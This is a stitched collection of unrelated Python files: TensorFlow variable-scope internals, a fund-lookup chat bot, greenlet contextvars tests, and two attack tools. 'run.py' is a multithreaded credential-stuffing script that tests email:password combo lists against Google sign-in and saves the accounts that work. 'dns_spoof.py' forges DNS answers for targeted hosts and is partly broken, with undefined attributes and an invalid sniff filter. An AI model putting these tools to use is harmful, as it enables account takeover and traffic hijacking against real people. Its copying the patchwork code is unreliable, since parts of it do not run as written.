default_name=default_name,
values=values,
initializer=initializer,
regularizer=regularizer,
caching_device=caching_device,
partitioner=partitioner,
custom_getter=custom_getter,
reuse=reuse,
dtype=dtype,
use_resource=use_resource,
constraint=constraint) as scope:
yield scope
def _compute_slice_dim_and_shape(full_shape, slicing):
"""Computes which dimension is being sliced and the typical slice shape."""
slice_shape = [0] * len(full_shape)
slice_dim = None
for dim, num_slices in enumerate(slicing):
dim_size = full_shape[dim]
if num_slices <= 0 or dim_size < num_slices:
raise ValueError("Cannot create %d slices for size %d. shape: %s, "
"slicing: %s" %
(num_slices, full_shape[dim], full_shape, slicing))
if num_slices == 1:
# Not slicing in this dimension.
slice_shape[dim] = dim_size
elif slice_dim is not None:
# We only support slicing along one of the dimensions.
raise ValueError("Can only slice a variable along one dimension: "
"shape: %s, slicing: %s" % (full_shape, slicing))
else:
# Note: We will add any extras onto the last slice, later.
slice_dim = dim
slice_shape[dim] = dim_size // num_slices
# Degenerate case: If "slicing" was all ones, pretend we are slicing along
# the first dimension.
if slice_dim is None:
slice_dim = 0
return slice_dim, slice_shape
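# Illustrative note (editor addition): for example,
# _compute_slice_dim_and_shape([20, 4], [5, 1]) returns (0, [4, 4]) -- the variable is
# split along dimension 0 into 5 slices of shape [4, 4] each.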
def _get_trainable_value(synchronization, trainable):
"""Computes the trainable value based on the given arguments."""
if synchronization == VariableSynchronization.ON_READ:
if trainable:
raise ValueError(
"Synchronization value can be set to "
"VariableSynchronization.ON_READ only for non-trainable variables. "
"You have specified trainable=True and "
"synchronization=VariableSynchronization.ON_READ.")
else:
# Set trainable to be false when variable is to be synced on read.
trainable = False
elif trainable is None:
trainable = True
return trainable
def default_variable_creator(next_creator=None, **kwargs):
"""Default variable creator."""
assert next_creator is None
initial_value = kwargs.get("initial_value", None)
trainable = kwargs.get("trainable", None)
collections = kwargs.get("collections", None)
validate_shape = kwargs.get("validate_shape", True)
caching_device = kwargs.get("caching_device", None)
name = kwargs.get("name", None)
variable_def = kwargs.get("variable_def", None)
dtype = kwargs.get("dtype", None)
expected_shape = kwargs.get("expected_shape", None)
import_scope = kwargs.get("import_scope", None)
constraint = kwargs.get("constraint", None)
use_resource = kwargs.get("use_resource", None)
# Set trainable value based on synchronization value.
synchronization = kwargs.get("synchronization", VariableSynchronization.AUTO)
trainable = _get_trainable_value(
synchronization=synchronization, trainable=trainable)
if use_resource is None:
use_resource = get_variable_scope().use_resource
if use_resource is None:
use_resource = _DEFAULT_USE_RESOURCE
use_resource = use_resource or context.executing_eagerly()
if use_resource:
return resource_variable_ops.ResourceVariable(
initial_value=initial_value, trainable=trainable,
collections=collections, validate_shape=validate_shape,
caching_device=caching_device, name=name, dtype=dtype,
constraint=constraint, variable_def=variable_def,
import_scope=import_scope)
else:
return variables.RefVariable(
initial_value=initial_value, trainable=trainable,
collections=collections, validate_shape=validate_shape,
caching_device=caching_device, name=name, dtype=dtype,
constraint=constraint, variable_def=variable_def,
expected_shape=expected_shape, import_scope=import_scope)
def default_variable_creator_v2(next_creator=None, **kwargs):
"""Default variable creator."""
assert next_creator is None
initial_value = kwargs.get("initial_value", None)
trainable = kwargs.get("trainable", None)
validate_shape = kwargs.get("validate_shape", True)
caching_device = kwargs.get("caching_device", None)
name = kwargs.get("name", None)
variable_def = kwargs.get("variable_def", None)
dtype = kwargs.get("dtype", None)
import_scope = kwargs.get("import_scope", None)
constraint = kwargs.get("constraint", None)
# Set trainable value based on synchronization value.
synchronization = kwargs.get("synchronization", VariableSynchronization.AUTO)
trainable = _get_trainable_value(
synchronization=synchronization, trainable=trainable)
return resource_variable_ops.ResourceVariable(
initial_value=initial_value, trainable=trainable,
validate_shape=validate_shape, caching_device=caching_device,
name=name, dtype=dtype, constraint=constraint, variable_def=variable_def,
import_scope=import_scope)
variables.default_variable_creator = default_variable_creator
variables.default_variable_creator_v2 = default_variable_creator_v2
def _make_getter(captured_getter, captured_previous):
"""Gets around capturing loop variables in python being broken."""
return lambda **kwargs: captured_getter(captured_previous, **kwargs)
# TODO(apassos) remove forwarding symbol
variable = variables.VariableV1
@tf_export(v1=["variable_creator_scope"])
@tf_contextlib.contextmanager
def variable_creator_scope_v1(variable_creator):
"""Scope which defines a variable creation function to be used by variable().
variable_creator is expected to be a function with the following signature:
```
def variable_creator(next_creator, **kwargs)
```
The creator is supposed to eventually call the next_creator to create a
variable if it does want to create a variable and not call Variable or
ResourceVariable directly. This helps make creators composable. A creator may
choose to create multiple variables, return already existing variables, or
simply register that a variable was created and defer to the next creators in
line. Creators can also modify the keyword arguments seen by the next
creators.
Custom getters in the variable scope will eventually resolve down to these
custom creators when they do create variables.
  The valid keyword arguments in kwargs are:
initial_value: A `Tensor`, or Python object convertible to a `Tensor`,
which is the initial value for the Variable. The initial value must have
a shape specified unless `validate_shape` is set to False. Can also be a
callable with no argument that returns the initial value when called. In
that case, `dtype` must be specified. (Note that initializer functions
from init_ops.py must first be bound to a shape before being used here.)
trainable: If `True`, the default, also adds the variable to the graph
collection `GraphKeys.TRAINABLE_VARIABLES`. This collection is used as
the default list of variables to use by the `Optimizer` classes.
`trainable` defaults to `True` unless `synchronization` is
set to `ON_READ`.
collections: List of graph collections keys. The new variable is added to
these collections. Defaults to `[GraphKeys.GLOBAL_VARIABLES]`.
validate_shape: If `False`, allows the variable to be initialized with a
value of unknown shape. If `True`, the default, the shape of
`initial_value` must be known.
caching_device: Optional device string describing where the Variable
should be cached for reading. Defaults to the Variable's device.
If not `None`, caches on another device. Typical use is to cache
on the device where the Ops using the Variable reside, to deduplicate
copying through `Switch` and other conditional statements.
name: Optional name for the variable. Defaults to `'Variable'` and gets
uniquified automatically.
dtype: If set, initial_value will be converted to the given type.
If `None`, either the datatype will be kept (if `initial_value` is
a Tensor), or `convert_to_tensor` will decide.
constraint: A constraint function to be applied to the variable after
updates by some algorithms.
use_resource: if True, a ResourceVariable is always created.
    synchronization: Indicates when a distributed variable will be
aggregated. Accepted values are constants defined in the class
`tf.VariableSynchronization`. By default the synchronization is set to
`AUTO` and the current `DistributionStrategy` chooses
when to synchronize. If `synchronization` is set to `ON_READ`,
`trainable` must not be set to `True`.
aggregation: Indicates how a distributed variable will be aggregated.
Accepted values are constants defined in the class
`tf.VariableAggregation`.
This set may grow over time, so it's important the signature of creators is as
mentioned above.
Args:
variable_creator: the passed creator
Yields:
A scope in which the creator is active
"""
with ops.get_default_graph()._variable_creator_scope(variable_creator): # pylint: disable=protected-access
yield
# Note: only the docstrings differ between this and v1.
@tf_export(v2=["variable_creator_scope"])
@tf_contextlib.contextmanager
def variable_creator_scope(variable_creator):
"""Scope which defines a variable creation function to be used by variable().
variable_creator is expected to be a function with the following signature:
```
def variable_creator(next_creator, **kwargs)
```
The creator is supposed to eventually call the next_creator to create a
variable if it does want to create a variable and not call Variable or
ResourceVariable directly. This helps make creators composable. A creator may
choose to create multiple variables, return already existing variables, or
simply register that a variable was created and defer to the next creators in
line. Creators can also modify the keyword arguments seen by the next
creators.
Custom getters in the variable scope will eventually resolve down to these
custom creators when they do create variables.
  The valid keyword arguments in kwargs are:
initial_value: A `Tensor`, or Python object convertible to a `Tensor`,
which is the initial value for the Variable. The initial value must have
a shape specified unless `validate_shape` is set to False. Can also be a
callable with no argument that returns the initial value when called. In
that case, `dtype` must be specified. (Note that initializer functions
from init_ops.py must first be bound to a shape before being used here.)
trainable: If `True`, the default, GradientTapes automatically watch
uses of this Variable.
validate_shape: If `False`, allows the variable to be initialized with a
value of unknown shape. If `True`, the default, the shape of
`initial_value` must be known.
caching_device: Optional device string describing where the Variable
should be cached for reading. Defaults to the Variable's device.
If not `None`, caches on another device. Typical use is to cache
on the device where the Ops using the Variable reside, to deduplicate
copying through `Switch` and other conditional statements.
name: Optional name for the variable. Defaults to `'Variable'` and gets
uniquified automatically.
dtype: If set, initial_value will be converted to the given type.
If `None`, either the datatype will be kept (if `initial_value` is
a Tensor), or `convert_to_tensor` will decide.
constraint: A constraint function to be applied to the variable after
updates by some algorithms.
    synchronization: Indicates when a distributed variable will be
aggregated. Accepted values are constants defined in the class
`tf.VariableSynchronization`. By default the synchronization is set to
`AUTO` and the current `DistributionStrategy` chooses
when to synchronize. If `synchronization` is set to `ON_READ`,
`trainable` must not be set to `True`.
aggregation: Indicates how a distributed variable will be aggregated.
Accepted values are constants defined in the class
`tf.VariableAggregation`.
This set may grow over time, so it's important the signature of creators is as
mentioned above.
Args:
variable_creator: the passed creator
Yields:
A scope in which the creator is active
"""
with ops.get_default_graph()._variable_creator_scope(variable_creator): # pylint: disable=protected-access
yield
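# Editor-added illustrative sketch (not part of the original module). A creator is
# composable: it can rewrite the kwargs seen by the next creator before delegating.
# The helper below is hypothetical and is never invoked here; it assumes the
# module-level `dtypes` and `variables` imports that this file already uses elsewhere.
def _example_force_float64_creator(next_creator, **kwargs):
  kwargs["dtype"] = dtypes.float64  # force every variable created in the scope to float64
  return next_creator(**kwargs)
# Usage (sketch):
#   with variable_creator_scope(_example_force_float64_creator):
#     v = variables.Variable(1.0)  # created with dtype float64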
|
dns_spoof.py
|
import os
from interface import Interface
from scapy.all import *
class DNSSpoof:
def __init__(self, interface, domain_file):
self.service = 'dnsmasq'
self.active = False
self.interface = Interface(interface, True)
self.interface.enable_sniff()
self.domain_file = domain_file
self.domains = list()
self.load_domains()
######################################################################################################################
###################################################### DNSMasq ######################################################
######################################################################################################################
    def load_domains(self):
        with open(self.domain_file, 'r') as f:
            # Iterate over lines (f.read() alone would iterate over characters)
            self.domains = [line.strip() for line in f if line.strip()]
def start_dns(self):
os.system('service {} start'.format(self.service))
self.active = True
def stop_dns(self):
os.system('service {} stop'.format(self.service))
self.active = False
def restart_dns(self):
os.system('service {} restart'.format(self.service))
self.active = True
    def exist_domain(self, domain):
        with open(self.domain_file, 'r') as f:
            for line in f:  # iterate over lines, not characters
                if domain in line:
                    return True
        return False
    def add_spoof_domain(self, domain):
        if not self.exist_domain(domain):
            with open(self.domain_file, 'a') as f:
                # NOTE: self.server is expected to be set elsewhere on this object.
                line = '{Domain} {Server}\n'.format(Domain=domain, Server=self.server)
                f.write(line)
            return 'domain_added'
        else:
            return 'domain_exist'
    def delete_spoof_domain(self, domain):
        if self.exist_domain(domain):
            # 'rw' is not a valid open() mode: read the file first, then rewrite it.
            with open(self.domain_file, 'r') as f:
                lines = f.read().split('\n')
            lines.remove('{Domain} {Server}'.format(Domain=domain, Server=self.server))
            with open(self.domain_file, 'w') as f:
                f.write('\n'.join(lines))
######################################################################################################################
####################################################### SCAPY #######################################################
######################################################################################################################
def start(self):
self.sniff_thread = threading.Thread(target=self._sniff_packet)
self.sniff_thread.daemon = True
self.sniff_thread.start()
def send_spoofed_response(self, dest_ip, dest_port, domain):
response = DNSRR(rrname=domain.qname,ttl=1,rdata=self.ip)
send(IP(dst=dest_ip)/UDP(dport=dest_port)/DNS(qr=1,ar=response))
def _sniff_packet(self):
self.interface.enable_sniff()
sniff(prn=self._process_packet, iface=self.interface.get_monitor_interface_id(), stop_filter = lambda x: not self._should_continue, filter="dns.qry.type == 1", store=0)
def _process_packet(self, packet):
packet.show()
ip = packet.getlayer(IP)
udp = packet.getlayer(UDP)
if ip.src in self.targets:
dns = packet.getlayer(DNS)
if dns.query.name in self.domains:
self.send_spoofed_response(ip.src, udp.src_port, dns.qd)
|
message_processor.py
|
import re
import base64
import utils
import pandas as pd
from threading import Thread
from utils import log
from collections import Counter
from sym_api_client_python.clients.sym_bot_client import SymBotClient
from sym_api_client_python.processors.sym_message_parser import SymMessageParser
from .admin_processor import AdminProcessor
from .card_processor import CardProcessor
from bs4 import BeautifulSoup
class MessageProcessor:
def __init__(self, bot_client: SymBotClient):
self.bot_client = bot_client
self.message_client = self.bot_client.get_message_client()
self.message_parser = SymMessageParser()
self.admin_processor = AdminProcessor(self.bot_client)
self.card_processor = CardProcessor(self.bot_client)
self.help_message = 'Welcome to MI Flash Bot. Please use the following commands:<ul><li><b>/help</b>: show this message</li><li><b>/fundname [search query]</b>: search for funds by name</li><li><b>/isin [search query]</b>: search for funds by ISIN</li></ul>'
self.help_message_admin = 'Welcome to MI Flash Bot. Please use the following commands:<ul><li><b>/help</b>: show this message</li><li><b>/download</b>: get the active data file</li><li><b>/upload</b>: used together with an attached data file to replace the active data file</li><li><b>/blast [message]</b>: used together with an attached file containing 1 email address per line to blast IM messages</li><li><b>/logs</b>: get the bot activity log</li></ul>'
self.other_message = 'Hi there, welcome to the Managed Investments Bot.<br/>I am here to make your life easier. I can help you access quick information on funds covered by BOS.<br/><br/>To start, you can search by either of the following:<br/><b>(1) Search by Fund Name:</b> enter /fundname followed by name of the fund. Example: /fundname PIMCO GIS Income<br/><b>(2) Search by ISIN:</b> enter /ISIN followed by ISIN number of the fund. Example: /ISIN XS1234567<br/><br/>Let us start!'
def parse_message(self, msg):
msg_text = []
soup = BeautifulSoup(msg['message'], 'html.parser')
for i in soup.findAll(text=True):
msg_text.extend(i.split(' '))
stream_id = self.message_parser.get_stream_id(msg)
while (len(msg_text) > 0 and len(msg_text[0].strip()) == 0):
msg_text.pop(0)
command = msg_text[0].lower() if len(msg_text) > 0 else ''
rest_of_message = str.join(' ', msg_text[1:]) if len(msg_text) > 1 else ''
return stream_id, msg_text, command, rest_of_message
def get_attachment(self, stream_id, message_id, file_id):
attachment = self.message_client.get_msg_attachment(stream_id, message_id, file_id)
return base64.b64decode(attachment)
def processROOM(self, msg):
displayName = msg['user']['displayName']
stream_id, msg_text, command, rest_of_message = self.parse_message(msg)
if stream_id != utils.admin_stream_id:
log(f'Ignoring room message from non-admin stream {stream_id}')
return
log(f'Executing admin {command} query from {displayName}')
if command == '/help':
utils.send_message(stream_id, self.help_message_admin)
elif command == '/upload':
if 'attachments' not in msg or len(msg['attachments']) != 1:
utils.send_message(stream_id, 'Please attach data file along with /upload')
return
if not str(msg['attachments'][0]['name']).lower().endswith('.csv'):
utils.send_message(stream_id, 'Please attach a CSV data file')
return
self.admin_processor.send_data_file(stream_id)
attachment = self.get_attachment(stream_id, msg['messageId'], msg['attachments'][0]['id'])
self.admin_processor.replace_data_file(stream_id, attachment)
elif command == '/download':
self.admin_processor.send_data_file(stream_id)
elif command == '/logs':
self.admin_processor.send_log_file(stream_id)
elif command == '/blast':
if len(msg_text) < 2:
utils.send_message(stream_id, 'Please use /blast [message]')
return
if 'attachments' not in msg or len(msg['attachments']) != 1:
utils.send_message(stream_id, 'Please attach 1 file containing an email per line along with /blast')
return
log(f'Sending blast message: {rest_of_message}')
attachment = self.get_attachment(stream_id, msg['messageId'], msg['attachments'][0]['id'])
blast_thread = Thread(target = self.admin_processor.blast_messages, args = (attachment, rest_of_message))
blast_thread.start()
elif command.startswith('/'):
utils.send_message(stream_id, f'Sorry, I do not understand the command {command}')
def processIM(self, msg):
userId = msg['user']['userId']
displayName = msg['user']['displayName']
stream_id, msg_text, command, rest_of_message = self.parse_message(msg)
# Administrative commands
if command == '/help':
utils.send_message(stream_id, self.help_message)
elif command == '/clear':
utils.send_blanks(stream_id, 50)
# User performs an initial command search
elif (command == '/isin' or command == '/fundname') and len(rest_of_message) > 0:
log(f'Executing {command} query from {displayName} against {rest_of_message}')
if command == '/fundname':
data_field = 'Funds'
field_label = 'fund names'
else:
data_field = 'ISIN (base ccy)'
field_label = 'ISIN codes'
data_rows = self.doSearch(utils.data, rest_of_message, data_field)
if len(data_rows) == 0:
utils.send_message(stream_id, f'No results found for {field_label} matching {rest_of_message}')
elif len(data_rows) == 1:
self.card_processor.send_card(stream_id, data_rows)
else:
self.showMultiOptions(userId, stream_id, data_rows, rest_of_message)
utils.user_log(msg['user'], command, rest_of_message)
        # User performs a multiple-choice selection
        elif command.isdigit() and userId in utils.user_state.keys():
            choice = int(command) - 1
            if 0 <= choice < len(utils.user_state[userId]):
                choice_text = utils.user_state[userId][choice]
                data_row = utils.data[utils.data.Funds == choice_text]
                self.card_processor.send_card(stream_id, data_row)
                del utils.user_state[userId]
                utils.user_log(msg['user'], '/fundname select', choice_text)
            else:
                utils.send_message(stream_id, 'Invalid choice')
# User does anything else
else:
utils.send_message(stream_id, self.other_message)
def doSearch(self, data_rows, rest_of_message, data_field):
search_tokens = set(rest_of_message.lower().split())
# Try contains match
contains_match = utils.data[utils.data[data_field].str.contains(rest_of_message, flags=re.IGNORECASE, na=False)]
# If only 1 hit in contains match or if only 1 word in search query, return this
if len(contains_match) == 1 or len(search_tokens) == 1:
return contains_match
# If more than 1 word in search query, perform tokenised search
for i in data_rows.index:
# Count distinct matching tokens between the search query and data values
value_tokens = set(str(data_rows.loc[i, 'Funds']).lower().split())
match_dict = { k: dict(Counter(value_tokens)).get(k, 0) for k in search_tokens }
sort_weight = sum(match_dict.values())
data_rows.loc[i, 'sort_weight'] = sort_weight
# If no tokens match, return empty result set
max_matches = data_rows['sort_weight'].max()
if (max_matches == 0):
return pd.DataFrame()
# If there is only 1 match with max token matches, return that result
try_exact_match = data_rows[data_rows.sort_weight == max_matches]
if len(try_exact_match) == 1:
return try_exact_match
# Prepare results with at least max - 1 matching tokens
search_threshold = max_matches - 1 if max_matches > 1 else max_matches
data_rows = data_rows[data_rows.sort_weight >= search_threshold]
# Sort by matching tokens in descending then fund name in ascending
return data_rows.sort_values(['sort_weight', 'Funds'], ascending=[False, True])
def showMultiOptions(self, userId, stream_id, data_rows, rest_of_message):
# Extract funds column, slice first 10 results and save
results = list(data_rows['Funds'])[:10]
utils.user_state[userId] = results
# Format results as list items with indexes and send to user
results_str = ''.join([f"<li>{i+1}: {result}</li>" for i, result in enumerate(results)])
utils.send_message(stream_id, f"Please choose one option: <ul>{results_str}</ul>")
|
run.py
|
import requests
import json
import threading
import os
import glob
SUCCESS_LOGIN = 0
FAILED_LOGIN = 0
Threadtimeout = 60
ThreadPoolSize = 3
ValidEmails = []
storeThreads = []
def threadManager(function,Funcargs,Startthreshold,Threadtimeout=5):
if len(storeThreads) != Startthreshold:
storeThreads.append(threading.Thread(target=function,args=tuple(Funcargs) ))
if len(storeThreads) == Startthreshold:
for metaThread in storeThreads:
metaThread.start()
for metaThread in storeThreads:
metaThread.join(Threadtimeout)
del storeThreads[::]
def G_identifier(email,SessionManager):
while 1:
try:
params = (('hl', 'en'),('_reqid', '60794'),('rt', 'j'))
headers = {
'x-same-domain': '1',
'origin': 'https://accounts.google.com',
'accept-encoding': 'gzip, deflate, br',
'accept-language': 'en-US,en;q=0.9,ar;q=0.8',
'google-accounts-xsrf': '1',
'cookie': 'GAPS=1:5anptsFCcX86o8zx79JaMKbjR6SUSg:i9ZZi85-G8eD7wsC; ',
'user-agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/66.0.3359.139 Safari/537.36',
'content-type': 'application/x-www-form-urlencoded;charset=UTF-8',
'accept': '*/*',
'referer': 'https://accounts.google.com/signin/v2/identifier?continue=https%3A%2F%2Fwww.youtube.com%2Fsignin%3Fhl%3Den%26app%3Ddesktop%26next%3D%252F%26action_handle_signin%3Dtrue&hl=en&service=youtube&passive=true&uilel=3&flowName=GlifWebSignIn&flowEntry=ServiceLogin',
'authority': 'accounts.google.com',
'dnt': '1'
}
data = [
('continue', 'https://www.youtube.com/signin?hl=en&app=desktop&next=%2F&action_handle_signin=true'),
('service', 'youtube'),
('hl', 'en'),
('f.req', '["{email}","",[],null,"EG",null,null,2,false,true,[null,null,[2,1,null,1,"https://accounts.google.com/ServiceLogin?continue=https%3A%2F%2Fwww.youtube.com%2Fsignin%3Fhl%3Den%26app%3Ddesktop%26next%3D%252F%26action_handle_signin%3Dtrue&hl=en&service=youtube&passive=true&uilel=3",null,[],4,[],"GlifWebSignIn"],1,[null,null,[]],null,null,null,true],"{email}"]'.format(email=email)),
('cookiesDisabled', 'false'),
('deviceinfo', '[null,null,null,[],null,"EG",null,null,[],"GlifWebSignIn",null,[null,null,[]]]'),
('gmscoreversion', 'undefined'),
('checkConnection', 'youtube:202:1'),
('checkedDomains', 'youtube'),
('pstMsg', '1')
]
response = SessionManager.post('https://accounts.google.com/_/signin/sl/lookup', headers=headers, params=params, data=data)
return json.loads((response.content).replace(")]}'",""))[0][0][2]
except:
pass
def login(identifier,password,SessionManager):
while(1):
try:
params = (('hl', 'en'),('_reqid', '260794'),('rt', 'j'))
headers = {
'x-same-domain': '1',
'origin': 'https://accounts.google.com',
'accept-encoding': 'gzip, deflate, br',
'accept-language': 'en-US,en;q=0.9,ar;q=0.8',
'google-accounts-xsrf': '1',
'cookie': 'GAPS=1:Q6gx2sQ34TRRxWUO3mC1_Be79xLYpA:akZ-LyOsSbAsOKOQ',
'user-agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/66.0.3359.139 Safari/537.36',
'content-type': 'application/x-www-form-urlencoded;charset=UTF-8',
'accept': '*/*',
'referer': 'https://accounts.google.com/signin/v2/sl/pwd?continue=https%3A%2F%2Fwww.youtube.com%2Fsignin%3Fhl%3Den%26app%3Ddesktop%26next%3D%252F%26action_handle_signin%3Dtrue&hl=en&service=youtube&passive=true&uilel=3&flowName=GlifWebSignIn&flowEntry=ServiceLogin&cid=1&navigationDirection=forward',
'authority': 'accounts.google.com',
'dnt': '1',
}
data = [
('continue', 'https://www.youtube.com/signin?hl=en&app=desktop&next=%2F&action_handle_signin=true'),
('service', 'youtube'),
('hl', 'en'),
('f.req', '["{G_identifier}",null,1,null,[1,null,null,null,["{Password}",null,true]],[null,null,[2,1,null,1,"https://accounts.google.com/ServiceLogin?continue=https%3A%2F%2Fwww.youtube.com%2Fsignin%3Fhl%3Den%26app%3Ddesktop%26next%3D%252F%26action_handle_signin%3Dtrue&hl=en&service=youtube&passive=true&uilel=3",null,[],4,[],"GlifWebSignIn"],1,[null,null,[]],null,null,null,true]]'.format(G_identifier=identifier,Password=password)),
('cookiesDisabled', 'false'),
('deviceinfo', '[null,null,null,[],null,"EG",null,null,[],"GlifWebSignIn",null,[null,null,[]]]'),
('gmscoreversion', 'undefined'),
('checkConnection', 'youtube:202:1'),
('checkedDomains', 'youtube'),
('pstMsg', '1'),
]
response = SessionManager.post('https://accounts.google.com/_/signin/sl/challenge', headers=headers, params=params, data=data)
login = (response.content).replace(")]}'","")
login = json.loads(login)
try:
if "CheckCookie" in response:
return 1
if str(login[0][0][5][5]) == "INCORRECT_ANSWER_ENTERED":
return 0
except:
return 1
except:
pass
def show_status(action):
os.system("cls")
banner = """
>>> ===================================================== <<<
>>> [DEV] : Koleksibot <<<
>>> [GitHub] : https://www.github.com/koleksibot <<<
>>> [Version] : 1.0v <<<
>>> +++++++++++++++++++++++++++++++++++++++++++++++++++++ <<<
"""
if action == "START":
print banner
else:
s = "[+] Successful Logins = {}\n[!] Failed Logins = {}\n"
print banner
print s.format(SUCCESS_LOGIN,FAILED_LOGIN)
def main(email,password):
global FAILED_LOGIN
global SUCCESS_LOGIN
SessionManager = requests.Session()
identifier = G_identifier(email,SessionManager)
logged = login(identifier,password,SessionManager)
if not logged:
FAILED_LOGIN += 1
else:
SUCCESS_LOGIN += 1
ValidEmails.append(email)
try:
show_status("START")
ThreadPoolSize_custom = raw_input("[*] Choose number of threads [default = {}] [press Enter to use defaults]: ".format(ThreadPoolSize))
if ThreadPoolSize_custom != "":
ThreadPoolSize = int(ThreadPoolSize_custom)
os.chdir(".")
for file in glob.glob("*.txt"):
print(" |_--> " + file)
while (1):
combo_file = raw_input("[*] Setect the name of your [Email:Password] Combo file: ")
try:
read_combo = open(combo_file,"r").read()
break
except:
print "[!] Check your [Email:Password] Combo file name !"
raw_input("[+] All Done! , Press Enter to start .. ")
for data in read_combo.split("\n"):
if data == "":break
email = data.split(":")[0]
password = data.split(":")[1]
threadManager( main, [email,password] , ThreadPoolSize ,Threadtimeout)
show_status("")
write_t = ""
for x in ValidEmails:
write_t += "{}:{}\n".format(x,password)
open('working_emails.txt','a').write(write_t)
del ValidEmails[::]
except Exception as e:
print "[!!!] Fetal Error {}".format(e)
|
test_contextvars.py
|
import unittest
import gc
import sys
from functools import partial
from greenlet import greenlet
from greenlet import getcurrent
try:
from contextvars import Context
from contextvars import ContextVar
from contextvars import copy_context
except ImportError:
Context = ContextVar = copy_context = None
# We don't support testing if greenlet's built-in context var support is disabled.
@unittest.skipUnless(Context is not None, "ContextVar not supported")
class ContextVarsTests(unittest.TestCase):
def _new_ctx_run(self, *args, **kwargs):
return copy_context().run(*args, **kwargs)
def _increment(self, greenlet_id, ctx_var, callback, counts, expect):
if expect is None:
self.assertIsNone(ctx_var.get())
else:
self.assertEqual(ctx_var.get(), expect)
ctx_var.set(greenlet_id)
for _ in range(2):
counts[ctx_var.get()] += 1
callback()
def _test_context(self, propagate_by):
id_var = ContextVar("id", default=None)
id_var.set(0)
callback = getcurrent().switch
counts = dict((i, 0) for i in range(5))
lets = [
greenlet(
partial(
partial(copy_context().run, self._increment)
if propagate_by == "run"
else self._increment,
greenlet_id=i,
ctx_var=id_var,
callback=callback,
counts=counts,
expect=(
i - 1
if propagate_by == "share"
else 0
if propagate_by in ("set", "run")
else None
),
)
)
for i in range(1, 5)
]
for let in lets:
if propagate_by == "set":
let.gr_context = copy_context()
elif propagate_by == "share":
let.gr_context = getcurrent().gr_context
for i in range(2):
counts[id_var.get()] += 1
for let in lets:
let.switch()
if propagate_by == "run":
# Must leave each context.run() in reverse order of entry
for let in reversed(lets):
let.switch()
else:
# No context.run(), so fine to exit in any order.
for let in lets:
let.switch()
for let in lets:
self.assertTrue(let.dead)
# When using run(), we leave the run() as the greenlet dies,
# and there's no context "underneath". When not using run(),
# gr_context still reflects the context the greenlet was
# running in.
self.assertEqual(let.gr_context is None, propagate_by == "run")
if propagate_by == "share":
self.assertEqual(counts, {0: 1, 1: 1, 2: 1, 3: 1, 4: 6})
else:
self.assertEqual(set(counts.values()), set([2]))
def test_context_propagated_by_context_run(self):
self._new_ctx_run(self._test_context, "run")
def test_context_propagated_by_setting_attribute(self):
self._new_ctx_run(self._test_context, "set")
def test_context_not_propagated(self):
self._new_ctx_run(self._test_context, None)
def test_context_shared(self):
self._new_ctx_run(self._test_context, "share")
def test_break_ctxvars(self):
let1 = greenlet(copy_context().run)
let2 = greenlet(copy_context().run)
let1.switch(getcurrent().switch)
let2.switch(getcurrent().switch)
# Since let2 entered the current context and let1 exits its own, the
# interpreter emits:
# RuntimeError: cannot exit context: thread state references a different context object
let1.switch()
def test_not_broken_if_using_attribute_instead_of_context_run(self):
let1 = greenlet(getcurrent().switch)
let2 = greenlet(getcurrent().switch)
let1.gr_context = copy_context()
let2.gr_context = copy_context()
let1.switch()
let2.switch()
let1.switch()
let2.switch()
def test_context_assignment_while_running(self):
id_var = ContextVar("id", default=None)
def target():
self.assertIsNone(id_var.get())
self.assertIsNone(gr.gr_context)
# Context is created on first use
id_var.set(1)
self.assertIsInstance(gr.gr_context, Context)
self.assertEqual(id_var.get(), 1)
self.assertEqual(gr.gr_context[id_var], 1)
# Clearing the context makes it get re-created as another
# empty context when next used
old_context = gr.gr_context
gr.gr_context = None # assign None while running
self.assertIsNone(id_var.get())
self.assertIsNone(gr.gr_context)
id_var.set(2)
self.assertIsInstance(gr.gr_context, Context)
self.assertEqual(id_var.get(), 2)
self.assertEqual(gr.gr_context[id_var], 2)
new_context = gr.gr_context
getcurrent().parent.switch((old_context, new_context))
# parent switches us back to old_context
self.assertEqual(id_var.get(), 1)
gr.gr_context = new_context # assign non-None while running
self.assertEqual(id_var.get(), 2)
getcurrent().parent.switch()
# parent switches us back to no context
self.assertIsNone(id_var.get())
self.assertIsNone(gr.gr_context)
gr.gr_context = old_context
self.assertEqual(id_var.get(), 1)
getcurrent().parent.switch()
# parent switches us back to no context
self.assertIsNone(id_var.get())
self.assertIsNone(gr.gr_context)
gr = greenlet(target)
with self.assertRaisesRegex(AttributeError, "can't delete attr"):
del gr.gr_context
self.assertIsNone(gr.gr_context)
old_context, new_context = gr.switch()
self.assertIs(new_context, gr.gr_context)
self.assertEqual(old_context[id_var], 1)
self.assertEqual(new_context[id_var], 2)
self.assertEqual(new_context.run(id_var.get), 2)
gr.gr_context = old_context # assign non-None while suspended
gr.switch()
self.assertIs(gr.gr_context, new_context)
gr.gr_context = None # assign None while suspended
gr.switch()
self.assertIs(gr.gr_context, old_context)
gr.gr_context = None
gr.switch()
self.assertIsNone(gr.gr_context)
# Make sure there are no reference leaks
gr = None
gc.collect()
self.assertEqual(sys.getrefcount(old_context), 2)
self.assertEqual(sys.getrefcount(new_context), 2)
def test_context_assignment_different_thread(self):
import threading
ctx = Context()
var = ContextVar("var", default=None)
is_running = threading.Event()
should_suspend = threading.Event()
did_suspend = threading.Event()
should_exit = threading.Event()
holder = []
def greenlet_in_thread_fn():
var.set(1)
is_running.set()
should_suspend.wait()
var.set(2)
getcurrent().parent.switch()
holder.append(var.get())
def thread_fn():
gr = greenlet(greenlet_in_thread_fn)
gr.gr_context = ctx
holder.append(gr)
gr.switch()
did_suspend.set()
should_exit.wait()
gr.switch()
thread = threading.Thread(target=thread_fn, daemon=True)
thread.start()
is_running.wait()
gr = holder[0]
# Can't access or modify context if the greenlet is running
# in a different thread
with self.assertRaisesRegex(ValueError, "running in a different"):
getattr(gr, "gr_context")
with self.assertRaisesRegex(ValueError, "running in a different"):
gr.gr_context = None
should_suspend.set()
did_suspend.wait()
# OK to access and modify context if greenlet is suspended
self.assertIs(gr.gr_context, ctx)
self.assertEqual(gr.gr_context[var], 2)
gr.gr_context = None
should_exit.set()
thread.join()
self.assertEqual(holder, [gr, None])
# Context can still be accessed/modified when greenlet is dead:
self.assertIsNone(gr.gr_context)
gr.gr_context = ctx
self.assertIs(gr.gr_context, ctx)
@unittest.skipIf(Context is not None, "ContextVar supported")
